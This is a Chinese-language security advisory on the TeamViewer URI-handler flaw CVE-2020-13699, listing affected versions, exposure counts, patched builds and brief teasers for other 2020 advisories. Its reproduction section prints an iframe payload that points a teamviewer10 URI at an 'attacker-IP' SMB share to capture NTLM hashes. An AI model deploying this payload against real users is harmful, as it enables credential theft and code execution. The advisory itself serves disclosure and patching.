一 漏洞概述
近日,TeamViewer发布安全公告,修复了一个漏洞(CVE-2020-13699),等级为高危。该漏洞源于程序无法正确引用其自定义URI处理程序,导致攻击者可起动TeamViewer并执行任意代码或获得密码哈希。
二 影响版本
TeamViewer 8,9, 10,11,12,13,14,15
三 复现过程
要利用该漏洞,用户需要浏览到一个恶意页面,该恶意页面会在其Web浏览器中加载iframe。攻击者会将iframe的src 属性设置为
'teamviewer10:--play \\ attacker-IP \ share \ fake.tvs'
此命令表示本地安装的TeamViewer应用程序通过服务器消息块(SMB)协议连接到攻击者的服务器。 攻击者使用精心制作的URL将恶意iframe嵌入网站中,该URL 会启动TeamViewer Windows桌面客户端并迫使其打开远程SMB共享。
由于是受害者的计算机发起与攻击者的SMB共享连接,因此攻击者不需要知道用户的密码,可自动通过身份验证并获得访问权限。
研究人员表示:“Windows在打开SMB共享时将执行NTLM身份验证,并且可以转发该请求以执行代码。”这会影响URI处理程序teamviewer10、teamviewer8、teamviewerapi、tvchat1、tvcontrol1、tvfiletransfer1、tvjoinv8、tvpresent1、tvsendfile1、tvsqcustomer1、tvsqsupport1、tvvideocall1和tvvpn1。
四 影响范围
根据 ZoomEye 网络空间搜索引擎对关键字 “TeamViewer” 进行搜索,共得到 80,988 条 IP 历史记录,主要分布在中国、美国等国家。
五 修复建议
目前厂商已发布补丁,Windows的TeamViewer用户应考虑升级到新的程序版本,其中包括:8.0.258861、9.0.28860、10.0.258873、11.0.258870、12.0.258869、13.2.36220、14.2.56676、14.7.48350、15.8.3。
下载链接:https://www.teamviewer.cn/cn/download/windows/
六 时间线
知道创宇发布漏洞情报时间:2020年8月9日
七 相关链接
TeamViewer:https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448
ZoomEye 网络空间搜索引擎:https://www.zoomeye.org/searchResult/report?q=app%3A%22TeamViewer%22
2020年09月17日,IBM发布安全公告,WebSphere Application Server中存在一个安全漏洞,该漏洞是由于WebSphere Application Server在处理XML数据时容易受到XML外部实体注入(XXE)攻击。
2020年9月22日,FastAdmin远程代码执行漏洞细节曝光,黑客登录前台会员中心,即可远程GetShell,风险极大。
2020年9月17日,VMware发布安全公告,在Spring Framework版本5.2.0-5.2.8、5.1.0-5.1.17、5.0.0-5.0.18、4.3.0-4.3.28和较旧的不受支持的版本中,发现了一个存在于Spring Framework中的反射型文件下载(Reflected File Download,RFD)漏洞(CVE-2020-5421)。
获取安全动态